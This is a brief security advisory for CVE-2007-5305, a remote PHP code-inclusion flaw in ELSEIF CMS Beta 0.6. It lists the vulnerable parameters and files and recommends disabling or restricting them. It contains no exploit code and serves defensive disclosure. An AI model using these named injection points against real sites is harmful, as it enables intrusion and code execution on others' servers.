CVE-2007-5305

Name of the Vulnerable Software and Affected Versions: ELSEIF CMS version Beta 0.6

Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in several parameters, including the contenus parameter to contenus.php, the tpelseifportalrepertoire parameter to multiple files such as votes.php, espaceperso.php, enregistrement.php, commentaire.php, and coeurusr.php in the utilisateurs/ directory, as well as articles/fonctions.php and depot/fonctions.php in the moduleajouter/ directory. Additionally, the corpsdesign parameter in articles/usrarticles.php and depot/usrdepot.php in moduleajouter/ is vulnerable. This could potentially lead to the execution of arbitrary code.

Recommendations: For ELSEIF CMS version Beta 0.6, consider disabling the contenus.php, votes.php, espaceperso.php, enregistrement.php, commentaire.php, coeurusr.php, articles/fonctions.php, depot/fonctions.php, articles/usrarticles.php, and depot/usrdepot.php files until a patch is available. Restrict access to the utilisateurs/ and moduleajouter/ directories to minimize the risk of exploitation. Avoid using the contenus, tpelseifportalrepertoire, and corpsdesign parameters in the affected files until the issue is resolved.